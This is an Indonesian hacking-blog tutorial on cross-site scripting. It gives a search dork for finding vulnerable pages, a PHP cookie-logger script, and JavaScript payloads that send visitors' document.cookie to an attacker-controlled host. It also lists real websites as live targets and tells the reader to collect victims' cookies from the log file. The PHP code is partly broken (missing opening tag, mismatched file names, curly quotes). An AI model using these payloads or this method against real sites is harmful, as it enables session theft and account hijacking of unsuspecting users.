ini sebenarnya cuman tutor biasa ja...( malumin ja nubis kelas kakap ) hehe gak usah basa - basi ah ...( btw udah banyak di bahas di blog2 laen ) capz deh .....
xss singkatan dari : Cross Site Scripting.
pengertian xss menurut kang aurel666 - jasakom crew adalah :
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client..klo ku terjemahin maksud kang aurel adalah hanya deface setempat aja ,,,hehe
nah untuk dapetin situs yang vurln dengan xss
masukin dork ini :
inurl:"search.php?q="
cek vurn apa gak ... masukin script ini :
di belakang q="
untuk ngetes nah coba ini situs
http://www.gavinfriday.com/art/search.php?q=
tampilan jadi
xixixi ente leh edit edit dah dengan tag tag yang biasa di pergunakan di HTML
seperti tag h1, font, font color, img src, embed , marquee , banyak deh ,,,hehehe
nah sekarang kita juga mesti tau bahwa sebenarnya xss ini gak bisa di anggap remeh, dengan ini kita dapat mencuri cookies ( kue ) kepada mereka yang mengakses situs yang udah kita tanemin ama script pencuri cookies tersebut nah untuk ngeset hal tersebut ikutin langkah ini :
1. Buat dulu php nya
$c = $_GET['c'];
$file = fopen(’cookie.txt’,'a’);
fwrite($file,$c);
fclose($file);
?>
2. Buat log.txt
ntar ini buat nyalin cookies korban hehehe, buat nya dengan chmod 777
3. buat account di free hosting
klo ini terserah dah ,,, :P
4. Menuju target
nah masukin code ini
window.location = "http://server lo.com/cookielogger.php?c="+document.cookie
atau
document.location = "http://Server lo.com/cookielogger.php?c="+document.cookie
ntar dia jadi :
http://Target.com/search.php?q=document.location = "http://hosting anda.com/cookielogger.php?c="+document.cookie
nah periksa log.txt setelah ada korban yang buka situs tersebut dengan url xss anda
thx to aurel666 for this tutor
contoh situs-situs yg masih vurln silahkan:
http://booksxyz.com/search.php?q=
http://www.petra.ac.id/search/?q=
0 ^Rumpian[!]:
Posting Komentar